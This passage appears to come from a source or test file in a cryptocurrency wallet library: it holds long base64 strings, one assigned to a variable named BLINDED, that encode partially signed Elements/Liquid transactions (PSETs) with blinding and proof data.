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"
BLINDED = "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